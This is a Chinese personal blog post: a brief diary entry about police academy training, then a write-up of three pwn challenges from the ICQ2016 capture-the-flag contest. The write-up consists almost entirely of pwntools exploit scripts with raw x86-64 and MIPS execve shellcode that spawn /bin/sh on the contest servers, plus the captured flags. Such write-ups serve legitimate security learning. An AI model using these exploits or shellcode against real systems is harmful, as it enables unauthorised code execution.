杂记-2016-7-18

前记

这阵子发生了太多事情了,刚打完的ICQ的pwn部分都没来及上传,就匆匆的回到了警校进行节奏紧凑的训练。说实话,这次训练的体能真的不是我的强项,每次体能训练完了就像具尸体一样,不过那样又如何?我本就不是一个轻易服输的人。

ICQ2016-WP

pwn1

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
context(log_level="debug")
# p = process("./pwn1")
p = remote("106.75.37.29",10000)
elf = ELF("./pwn1")
scanf_plt = elf.symbols["__isoc99_scanf"]
system_plt = elf.symbols["system"]
# system_got
#0x0804857E
def add(off,value):
p.recvuntil("input index:")
p.sendline(str(off))
p.recvuntil("value:")
p.sendline(str(value))
p.recvuntil("input index:")
p.sendline(str(0x28-0xc))
p.recvuntil("value:")
p.sendline("0")
def change(off,l):
i = 0
for x in l:
p1 = x & 0xff
p2 = (x >> 8) & 0xff
p3 = (x >> 16) & 0xff
p4 = (x >> 24) & 0xff
add(60-16+i,p1)
i+=1
add(60-16+i,p2)
i+=1
add(60-16+i,p3)
i+=1
add(60-16+i,p4)
i+=1
return i
l = [scanf_plt,0x080486ae,0x080486ED,0x804A028,scanf_plt,0x080486ae,0x080486ED,0x804A02c,system_plt,0x080486ae,0x804A028]
#system_plt,0x080486ae,0x804A028
index = change(60,l)
p.recvuntil("input index:")
p.sendline(str(0x28-0xc))
p.recvuntil("value:")
p.sendline("10")
p.recvuntil("Your Array:0 0 0 0 0 0 0 0 0 0 ")
# gdb.attach(p,"b*0x0804857E\nc")
p.sendline(str(u32("/bin")))
p.sendline(str(u32("/sh\0")))
p.interactive()
#flag{9587c60c6962efc66d5adc7d18ee5500}

pwn2

卡了一段时间,挺好玩的,exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
context(log_level="debug")
# p = process("./pwn2")
p = remote("106.75.37.31",23333)
p.recvuntil("ight!\n\n")
op_add_mv = chr((0xD70-0xb10)/8+43)
op_exit = chr((0xD40-0xb10)/8+43)
op_sub = chr((0xB28-0xb10)/8+43)
op_mov_l = chr((0xD20-0xb10)/8+43)
for x in range(0,23):
p.sendline(op_sub)
for x in range(0,0x2f+2):
p.sendline(op_add_mv)
for x in range(0,4):
p.sendline(op_sub)
shellcode = "\x90"*60+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
p.sendline(str(0x602080+40))
p.sendline(str(0x602080+40))
p.sendline(shellcode)
p.sendline(op_mov_l)
p.sendline(op_add_mv)
# gdb.attach(p,"b*0x400776\nc")
p.sendline(op_exit)
p.interactive()
#flag{53ed43a93ec84fe99ddbd33d5acf5284}

pwn3

没做出来,本地没有调试环境,卒。。

后面fuzz了一下,exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
context(log_level="debug")
shellcode1 = "\xff\xff\x10\x04\xab\x0f\x02\x24\x55\xf0\x46\x20\x66\x06\xff\x23\xc2\xf9\xec\x23\x66\x06\xbd\x23\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf\x9a\xf9\xbd\x23\x21\x20\x80\x01\x21\x28\xa0\x03\xcc\xcd\x44\x03/bin/sh\x00"
shellcode2 = "\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c"
for y in range(0,10):
for x in range(0,4):
try:
p = remote("106.75.32.60",10000)
p.recvuntil("lp' for help.\n")
p.sendline("2057561479")
data = p.recvuntil("\n")[-9:-1]
off = int(data,16)
print "shellcode_addr = " +hex(off)
payload = "20160606 0"
payload += "\x00"*(0x70+y-len(shellcode2)-len(payload))+shellcode2+p32(off+29+x)
# payload += "\x00"*(0x74-len(shellcode2)-10)+shellcode+p32(off)
print y,x
p.sendline(payload)
p.interactive()
except:
p.close()

后记

这阵子可能真的没有时间去做二进制研究了。

直视自己。

×

你要赏我吃糖果吗?

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. 前记
  2. 2. ICQ2016-WP
  3. 3. pwn1
  4. 4. pwn2
  5. 5. pwn3
  6. 6. 后记
,
隐藏